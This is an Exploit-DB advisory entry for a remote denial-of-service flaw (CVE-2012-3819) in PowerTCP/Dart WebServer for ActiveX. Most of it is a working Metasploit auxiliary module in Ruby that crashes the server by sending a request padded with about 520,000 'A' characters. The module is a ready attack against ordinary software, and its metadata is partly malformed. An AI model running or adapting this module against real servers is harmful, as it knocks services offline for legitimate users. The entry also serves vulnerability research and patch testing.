PowerTCP WebServer for - ActiveX Denial of Service

EDB-ID:

37905




Platform:

Windows

Date:

2012-09-28


source: https://www.securityfocus.com/bid/55761/info

PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.

PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected. 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
    super(update_info(info,
        'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
        Dart Webserver from Dart Communications throws a stack
overflow exception
        when processing large requests.
    }
    ,
    'Author' => [
    'catatonicprime'
    ],
    'Version' => '$Revision: 15513 $',
    'License' => MSF_LICENSE,
    'References' => [
        [ 'CVE', '2012-3819' ],
        ],
    'DisclosureDate' => '9/28/2012'))

    register_options([
        Opt::RPORT(80),
        OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
    ])
    end
    def run
        serverIP = datastore['RHOST']
        if (datastore['RPORT'].to_i != 80)
            serverIP += ":" + datastore['RPORT'].to_s
        end
        size = datastore['SIZE']

        print_status("Crashing the server ...")
        request = "A" * size + "\r\n\r\n"
        connect
        sock.put(request)
        disconnect

    end
end